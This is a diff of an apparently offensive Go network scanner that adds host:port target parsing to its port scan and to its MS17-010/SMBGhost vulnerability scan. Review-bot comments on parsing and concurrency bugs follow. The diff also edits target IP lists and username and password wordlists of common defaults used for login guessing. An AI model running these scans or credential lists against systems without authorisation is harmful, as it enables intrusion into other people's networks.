@@ -74,8 +76,17 @@ func PortScan(host []string, ports []int) []PortResult { }) }) for _, ip := range host { - wg.Add(1) - _ = p.Invoke(ip) + if strings.Contains(ip, ":") { + addr := strings.Split(ip, ":")[0] + port, _ := strconv.Atoi(strings.Split(ip, ":")[1]) + if portConn(addr, port) { + Println(fmt.Sprintf("[+] %v %v open", addr, port)) + tempPort = append(tempPort, PortResult{addr, []int{port}}) + } + } else { + wg.Add(1) + _ = p.Invoke(ip) + } } wg.Wait() return tempPort diff --git a/cmd/vuln.go b/cmd/vuln.go index 334c8d9..be8bd5d 100644 --- a/cmd/vuln.go +++ b/cmd/vuln.go @@ -5,6 +5,7 @@ import ( "fmt" "github.com/panjf2000/ants/v2" "github.com/spf13/cobra" + "strings" "sync" ) @@ -67,6 +68,9 @@ func VulScan(ips []string, ms17010bool bool, allbool bool, smbGohstbool bool) { }) for _, ip := range ips { + if strings.Contains(ip, ":") && !strings.Contains(ip, ":445") { + continue + } wg.Add(1) _ = p.Invoke(ip) } diff --git a/ips.txt b/ips.txt index 850cd61..881c59d 100644 --- a/ips.txt +++ b/ips.txt @@ -2,3 +2,6 @@ 192.168.248.219 192.168.248.212 192.168.248.128 +127.0.0.1:445 +127.0.0.1:5985 + diff --git a/pass.txt b/pass.txt index 5d7cf4e..106214c 100644 --- a/pass.txt +++ b/pass.txt @@ -1,4 +1,4 @@ -123456 -P@ssw0rd -930517 -kali +123456 +P@ssw0rd +930517 +kali diff --git a/user.txt b/user.txt index dafb523..651954d 100644 --- a/user.txt +++ b/user.txt @@ -1,5 +1,5 @@ -administrator -Oadmin -kali -root - +administrator +Oadmin +kali +root +
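Review bot: `port, _ := strconv.Atoi(strings.Split(ip, ":")[1])` in PortScan discards the parse error, so a malformed `host:port` entry silently probes port 0, and the split breaks on IPv6 literals; ps.go already imports `net`, so `net.SplitHostPort` plus a checked `strconv.Atoi` handles both. The append to `tempPort` on this branch runs on the calling goroutine while `p.Invoke` workers are still active; if the pool callback (before the hunk) also appends to `tempPort`, the two appends race and need the same lock. PortScan starts before the hunk.
```go
	for _, ip := range host {
		if strings.Contains(ip, ":") {
			addr, portStr, err := net.SplitHostPort(ip)
			if err != nil {
				Println(fmt.Sprintf("[-] skip %q: %v", ip, err))
				continue
			}
			port, err := strconv.Atoi(portStr)
			if err != nil || port < 1 || port > 65535 {
				Println(fmt.Sprintf("[-] skip %q: invalid port %q", ip, portStr))
				continue
			}
			// … unchanged: portConn probe and tempPort append …
		} else {
			// … unchanged: wg.Add / p.Invoke …
		}
	}
```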
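Review bot: `!strings.Contains(ip, ":445")` in VulScan is a substring test, so entries like `host:4455` or `host:4450` pass the filter and reach the scan; `if strings.Contains(ip, ":") && !strings.HasSuffix(ip, ":445") {` matches only the intended port. The surviving `host:445` string is then handed to `p.Invoke(ip)` with its port suffix intact; whether the pool callback strips it is outside the hunk, so confirm the downstream check tolerates a `host:port` form. VulScan starts before the hunk and continues past it.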